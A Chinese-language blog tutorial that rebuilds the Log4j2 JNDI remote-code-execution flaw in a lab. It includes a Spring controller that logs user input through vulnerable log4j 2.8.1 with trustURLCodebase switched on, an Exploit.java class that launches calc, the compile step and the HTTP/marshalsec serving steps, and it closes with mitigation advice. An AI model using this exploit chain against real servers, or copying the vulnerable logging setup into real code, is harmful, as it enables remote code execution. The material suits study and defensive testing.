目录

1 Apache Log4j1.1 log4j的简介1.2 log4j的漏洞危害1.3 影响范围

2 漏洞环境搭建2.1 工具2.2 靶机搭建

2.3 漏洞利用2.3.1 构建POC代码2.3.2 测试

3 修复建议4 [原文链接](https://mp.weixin.qq.com/s/cWD46F0yyCy3F0u9SjBnEg)

1 Apache Log4j

1.1 log4j的简介

Log4j是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。被广泛地应用在中间件、开发框架与Web应用中。

1.2 log4j的漏洞危害

该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。

1.3 影响范围

Apache Log4j 2.x <= 2.15.0-rc1

2 漏洞环境搭建

2.1 工具

靶机服务器编写软件:idea Jdk版本:jdk1.8.0_144 服务器:Tomcat 工具包:marshalsec-0.0.3-SNAPSHOT-all.jar 其他需要使用的工具:Python3、postman

2.2 靶机搭建

新建Spring Web项目

完成初始化页面。

部署log4j的core和api依赖到pom.xml。maven仓库(Maven Repository)

org.apache.logging.log4j

log4j-core

2.8.1

org.apache.logging.log4j

log4j-api

2.8.1

新建HelloController类,并编写hello和login接口。 Hello接口用于直面观察“当开启Tomcat服务器的时候,是否运行正常“、 关键代码:

@RestController

public class HelloController {

private Logger logger = LogManager.getLogger(HelloController.class);

@RequestMapping("/hello")

public String hello() {

return "hello";

}

@RequestMapping(value = "/login", method = {RequestMethod.POST})

public String login(@RequestBody Map body) {

String username = body.get("username").toString();

String password = body.get("password").toString();

logger.error("username:{}, password:{}", username, password);

return "login";

}

}

编辑VM选项 “-Dcom.sun.jndi.ldap.object.trustURLCodebase=true“。 OK,完成靶机代码搭建。 开启服务器端口号9999监听

2.3 漏洞利用

2.3.1 构建POC代码

新建项目,新建java类,编写Exploit.java

import java.io.IOException;

public class Exploit {

public Exploit() {

try {

String cmds = "calc";

Runtime.getRuntime().exec(cmds);

} catch (IOException e) {

e.printStackTrace();

}

}

public static void main(String[] args) {

Exploit exploit = new Exploit();

}

}

打开cmd命令行,编译生成Exploit.class文件

javac Exploit.java

使用Python3开启http服务(用于传送病毒文件)

2.3.2 测试

开启运行靶机服务器 网页查看 证明正常运行靶机服务器

打开postman,新建Request,发送POST请求 即可看到弹出“计算机“。

3 修复建议

目前,Apache官方已发布新版本完成漏洞修复,建议用户尽快进行自查,并及时升级至最新版本: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

建议同时采用如下临时措施进行漏洞防范: (1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true; (2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true; (3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本; (4)部署使用第三方防火墙产品进行安全防护。

4 原文链接

本文用途只做学术交流,攥写不易,如果有用,老铁们点个赞。

相关阅读

评论可见,请评论后查看内容,谢谢!!!
 您阅读本篇文章共花了: